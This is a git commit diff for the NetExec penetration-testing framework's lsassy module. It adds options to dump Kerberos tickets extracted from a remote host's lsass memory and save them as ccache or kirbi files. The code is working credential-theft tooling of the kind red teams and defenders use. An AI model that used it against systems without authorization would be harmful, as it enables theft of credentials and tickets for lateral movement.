Merge pull request Pennyw0rth#833 from gatariee/feat-lsassy

NeffIsBack · web-flow · commit cb0f1259f557 · 2025-08-10T14:37:59.000+02:00
added `DUMP_TICKETS` flag to lsassy module
diff --git a/nxc/modules/lsassy.py b/nxc/modules/lsassy.py
@@ -4,12 +4,17 @@
 #  https://beta.hackndo.com [FR]
 #  https://en.hackndo.com [EN]
 
+import os
+import sys
 from lsassy.dumper import Dumper
 from lsassy.impacketfile import ImpacketFile
 from lsassy.parser import Parser
 from lsassy.session import Session
 
+from impacket.krb5.ccache import CCache
+
 from nxc.helpers.bloodhound import add_user_bh
+from nxc.paths import NXC_PATH
 
 
 class NXCModule:
@@ -21,13 +26,33 @@ def __init__(self, context=None, module_options=None):
         self.context = context
         self.module_options = module_options
         self.method = None
+        self.dump_tickets = True
+        self.save_dir = os.path.join(NXC_PATH, "modules", "lsassy")
+        self.ticket_type = "ccache"
 
     def options(self, context, module_options):
-        """METHOD              Method to use to dump lsass.exe with lsassy"""
+        """
+        METHOD              Method to use to dump lsass.exe with lsassy
+        DUMP_TICKETS        If set, will dump Kerberos tickets (Default: True)
+        SAVE_DIR            Directory to save dumped tickets
+        SAVE_TYPE           Type of ticket to save, either 'kirbi' or 'ccache' (Default: 'ccache')
+        """
         self.method = "comsvcs"
         if "METHOD" in module_options:
             self.method = module_options["METHOD"]
 
+        if "DUMP_TICKETS" in module_options:
+            self.dump_tickets = module_options["DUMP_TICKETS"].lower() in ["true"]
+
+        if "SAVE_DIR" in module_options:
+            self.save_dir = module_options["SAVE_DIR"]
+
+        if "SAVE_TYPE" in module_options:
+            self.ticket_type = module_options["SAVE_TYPE"]
+            if self.ticket_type not in ["kirbi", "ccache"]:
+                context.log.error(f"Invalid SAVE_TYPE '{self.ticket_type}'. Supported types are 'kirbi' and 'ccache'.")
+                sys.exit(1)
+
     def on_admin_login(self, context, connection):
         host = connection.host
         domain_name = connection.domain
@@ -67,7 +92,6 @@ def on_admin_login(self, context, connection):
             context.log.fail("Unable to parse lsass dump")
             return False
         credentials, tickets, masterkeys = parsed
-
         file.close()
         context.log.debug("Closed dumper file")
         file_path = file.get_file_path()
@@ -84,6 +108,9 @@ def on_admin_login(self, context, connection):
         if credentials is None:
             credentials = []
 
+        if self.dump_tickets and tickets:
+            self.write_tickets(context, tickets, host)
+
         for cred in credentials:
             c = cred.get_object()
             context.log.debug(f"Cred: {c}")
@@ -116,6 +143,52 @@ def on_admin_login(self, context, connection):
         context.log.debug("Calling process_credentials")
         self.process_credentials(context, connection, credentials_output)
 
+    def write_tickets(self, context, tickets, host):
+        if not tickets:
+            context.log.display("No Kerberos tickets found")
+            return
+
+        if not os.path.exists(self.save_dir):
+            try:
+                os.makedirs(self.save_dir)
+                context.log.debug(f"Created directory: {self.save_dir} for saving tickets")
+            except Exception as e:
+                context.log.fail(f"Error creating directory {self.save_dir}: {e}")
+                return
+
+        ticket_count = 0
+        for ticket in tickets:
+            for filename in ticket.kirbi_data:
+                try:
+                    base_filename = filename.split(".kirbi")[0]
+                    timestamp = ticket.EndTime.strftime("%Y%m%d%H%M%S")
+                    kirbi_data = ticket.kirbi_data[filename]
+
+                    if self.ticket_type == "ccache":
+                        ccache = CCache()
+                        ccache.fromKRBCRED(kirbi_data.dump())
+                        ticket_filename = f"{base_filename}_{host}_{timestamp}.ccache"
+                        ticket_content = ccache.getData()
+                    else:
+                        ticket_filename = f"{base_filename}_{host}_{timestamp}.kirbi"
+                        ticket_content = kirbi_data.dump()
+
+                    ticket_path = os.path.join(self.save_dir, ticket_filename)
+
+                    with open(ticket_path, "wb") as f:
+                        f.write(ticket_content)
+
+                    ticket_count += 1
+                    context.log.debug(f"Saved ticket: {ticket_filename}")
+
+                except Exception as e:
+                    context.log.fail(f"Error writing ticket {filename}: {e}")
+
+        if ticket_count > 0:
+            context.log.highlight(f"Saved {ticket_count} Kerberos ticket(s) to {self.save_dir}")
+        else:
+            context.log.display("No tickets were saved")
+
     def process_credentials(self, context, connection, credentials):
         if len(credentials) == 0:
             context.log.display("No credentials found")
